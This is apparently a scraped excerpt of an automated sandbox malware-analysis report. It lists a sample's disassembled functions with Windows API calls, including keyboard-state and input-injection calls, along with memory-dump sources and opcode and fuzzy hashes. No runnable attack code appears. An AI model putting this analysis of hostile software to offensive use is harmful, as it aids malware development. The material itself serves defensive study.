                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                                                                                                Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                                                                • API String ID: 3850602802-3636473452
                                                                                                                                                                                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                                                                                                                Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3985565216-0
                                                                                                                                                                                                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                                                                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                                                                                                                                Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0041F707
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                • String ID: [B
                                                                                                                                                                                                                • API String ID: 1020059152-632041663
                                                                                                                                                                                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                                                                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                                                                                                                Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00413DBD
                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                                                                                                                • _free.LIBCMT ref: 00413E07
                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 155776804-0
                                                                                                                                                                                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                                                                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                                                                                                                Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                                                                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                                                                                                Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 259663610-0
                                                                                                                                                                                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                                                                                                                Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3220332590-0
                                                                                                                                                                                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                                                                                Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1612042205-0
                                                                                                                                                                                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                                                                                                Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove_strncmp
                                                                                                                                                                                                                • String ID: >$U$\
                                                                                                                                                                                                                • API String ID: 2666721431-237099441
                                                                                                                                                                                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                                                                                                                Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221674350-0
                                                                                                                                                                                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                                                                                                Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2037614760-0
                                                                                                                                                                                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                                                                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                                                                                                                Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
